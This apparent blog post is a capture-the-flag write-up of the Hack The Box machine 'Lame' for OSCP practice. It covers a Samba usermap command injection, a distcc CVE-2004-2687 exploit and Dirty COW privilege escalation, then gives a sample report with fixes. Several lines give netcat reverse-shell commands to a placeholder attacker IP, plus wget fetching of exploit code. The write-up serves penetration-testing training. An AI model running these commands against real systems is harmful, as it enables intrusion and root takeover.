Lame — HacktheBox Writeup (OSCP)
Recon
First thing, I run a scan with AutoRecon. While that is going, I’ll run a quick nmap scan to get started.
nmap -sC -sV -Pn -T4 10.10.10.3
From our nmap scan we get back
A couple things to note off the bat. Vsftpd, OpenSSH, & Samba are running outdated versions. Also, we have anonymous ftp access.
FTP
Since we have anonymous FTP access time to see what’s there
Well that was a dead end. Nothing there and no write access.
Next thing I check to see if there are any exploits for this version of vsftpd.
I tested this one earlier but it did not work for me.
SMB
smbclient -L 10.10.10.3
Let’s see if we can list the contents of any of these shares(AutoRecon will automatically run this).
smbmap -H 10.10.10.3 -P 139 -R
Well, we only have access to tmp and there’s nothing interesting.
Let’s see what we can find with searchsploit.
Samba 3.0.20 < 3.0.25rc3 — ‘Username’ map script’ Command Execution (Metasploit) looks interesting. Run searchsploit -p 16320, this copies the path to my clipboard. From there type cat and paste the path (Ctrl+Shift+v).
After looking over the code we can get a pretty good idea what it is doing here. Time to connect to smb
smbclient //10.10.10.3/tmp
Once connected we need to start up a listener on our box
nc -lvp 1234
After that is running we need to run
logon “./=`nohup nc -e /bin/bash <attackers ip> <port>`"
There we go. Now we have root.
Method 2: DistCC
Looking through the results from my AutoRecon scan I come across another exploit.
nmap -vv — reason -Pn -sV -p 3632 — script=”banner,distcc-cve2004–2687" — script-args=”distcc-cve2004–2687.cmd=id” 10.10.10.3
Change this up a bit and we could get a reverse shell
nmap -vv — reason -Pn -sV -p 3632 10.10.10.3 — script=”banner,
distcc-cve2004–2687" — script-args=”distcc-cve2004–2687.cmd=nc -nv <attackers-ip> <port> -e /bin/bash”
Or, there’s a python script you can get off github
(CVE-2004–2687) DistCC Daemon — Command Execution (Python) (github.com)
python poc.py -t 10.10.10.3 -p 3632 -c “nc <attackers-ip> <port> -e /bin/bash”
PrivEsc
Now that we got our foothold let’s see check the kernel version
Run uname -r
Found the below exploit
On your machine startup a python server wherever you saved the exploit
python -m ‘SimpleHttpServer’ 81
On the victim pc use wget to download the exploit
wget http://<attacker-ip>:<port>/<exploit>
Now we just need to compile it.
gcc -pthread dirty.c -o dirty -lcrypt
Then
./dirty
It will prompt you to enter a new password
All that’s left is to ssh into the server with the new user and password
ssh firefart@10.10.10.3
Report
I am using whoisflynn/OSCP-Exam-Report-Template: Modified template for the OSCP Exam and Labs. Used during my passing attempt (github.com) for my report template. Below you’ll see a brief sample of the report on this machine.
System IP: 10.10.10.3
Service Enumeration
Ports Open
TCP: 21, 22, 139, 445, 3632
UDP: None
Nmap Scan Results:
Initial Shell Vulnerability Exploited: (CVE-2004–2687) DistCC Daemon — Command Execution
Vulnerability Explanation:
distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
Vulnerability Fix: Upgrade distcc to version 3.3 or newer (link)
Severity:
Base Score: 9.3 HIGH
Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Exploit Code Here: https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Initial Shell Screenshot:
Privilege Escalation
Vulnerability Exploited: Dirty COW (CVE-2016–5195)
Vulnerability Explanation:
Dirty COW (CVE-2016–5195) is a privilege escalation vulnerability in the Linux Kernel, which allows an unprivileged local user to gain write access to otherwise read-only memory mappings, and thus increases their privileges on the system.
Vulnerability Fix: Upgrade to Ubuntu 12.04 LTS or newer (link)
Severity:
Base Score: 7.8 HIGH
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit Code: https://www.exploit-db.com/exploits/40839
Proof Screenshot Here:
Thanks for reading! Please click the 👏 button and share it to help others! Connect with me on Twitter!